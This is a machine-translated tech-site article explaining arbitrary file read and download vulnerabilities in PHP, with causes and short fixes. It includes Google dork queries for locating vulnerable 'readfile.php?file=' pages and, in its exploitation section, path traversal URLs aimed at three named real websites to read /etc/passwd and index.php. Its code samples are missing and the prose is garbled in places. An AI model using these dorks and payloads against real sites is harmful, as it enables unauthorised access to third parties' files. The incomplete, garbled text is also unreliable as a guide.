Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Read and download any file

2025-03-29 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

Background introduction of 0x00

The business needs of some websites may provide the function of viewing or downloading files. If there are no restrictions on the files viewed or downloaded by users, they can view or download any files, such as source files, sensitive files, and so on.

0x01 file reading

There are many ways to read files in PHP. By default in web, the $filename variable may be user-controllable.

# when the variable $filename is not checked, or the check is not strict, the user can control this variable to read any file, such as / etc/passwd, / config.ini, etc.

Two ways of downloading Files with 0x02

1. Download directly:

two。 Increase header head

When $filename is not verified or fails, the user can control this variable to download any file, such as / etc/passwd,./index.php, etc., which creates an arbitrary file download vulnerability.

The cause of 0x03

All have functions to read files.

The path of the reading file can be controlled by the user, and it has not been verified, or the verification is not strict.

Output the contents of the file

0x04 Google Serch

Inurl: "readfile.php?file=" inurl: "download.php?file="

0x05 repair scheme

Filter (point)

Regularize the parameter format entered by the user and match whether the input format is qualified or not

Php.ini configuration open_basedir

0x06 instance vulnerability exploitation

(for testing only, do not destroy at will)

Address:

Url: http://hypnet.org.uk/shared/readfile.php?file=mental_health_audit_2014_06_15_130552.ppt

Vulnerability exploitation:

Http://hypnet.org.uk/shared/readfile.php?file=../../../../../../../../../../etc/passwd

Address:

Url: http://storiedifarina.it/readfile.php?file=pdf/storiedifarina.pdf

Vulnerability exploitation

Http://www.wodehouse.se/upload/readfile.php?file=../index.php

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report